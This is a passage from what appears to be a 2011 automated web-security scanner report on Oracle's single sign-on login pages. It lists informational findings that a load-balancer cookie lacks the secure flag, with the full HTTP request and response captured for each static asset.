The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 45 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCUu6uHK6EVADUS1EHWFB01t_dK X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89a.............!.......,...........D..Y.;
7.22. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/ip-o-logo.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 1728 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCUU6uHK6EVADUS1EHWFB01t_dJ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89ar..........22................BB.......................................................................................................__.............................................................[SNIP]...
7.23. https://login.oracle.com/mysso/sso_loginui/loginStyling.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/loginStyling.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/loginStyling.css HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:14 GMT Accept-Ranges: bytes Content-Length: 14395 Content-Type: text/css Last-Modified: Thu, 21 Jul 2011 20:04:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBQw6uHK6EVADUS1EHWFB01t_bN X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ /* Desktop Version */ body{font-family:Arial, Helvetica, sans-serif;} .Mwrapper{ display:none;} .wrapper{ display:block;margin:0px auto;width:974px; } .logo-header{float:left; width:974px; height:50px...[SNIP]...
7.24. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/moc_lib.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/moc_lib.js HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:14 GMT Accept-Ranges: bytes Content-Length: 5959 Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBR06uHK6EVADUS1EHWFB01t_bO X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ //-- moc_lib.js: Core JS library for www.oracle.com var ORA_UCM_INFO; //-- Function Library // to populate the user name -------------------------------------------------// function PopulateLogin()...[SNIP]...
7.25. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oracle-footer-tagline.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H6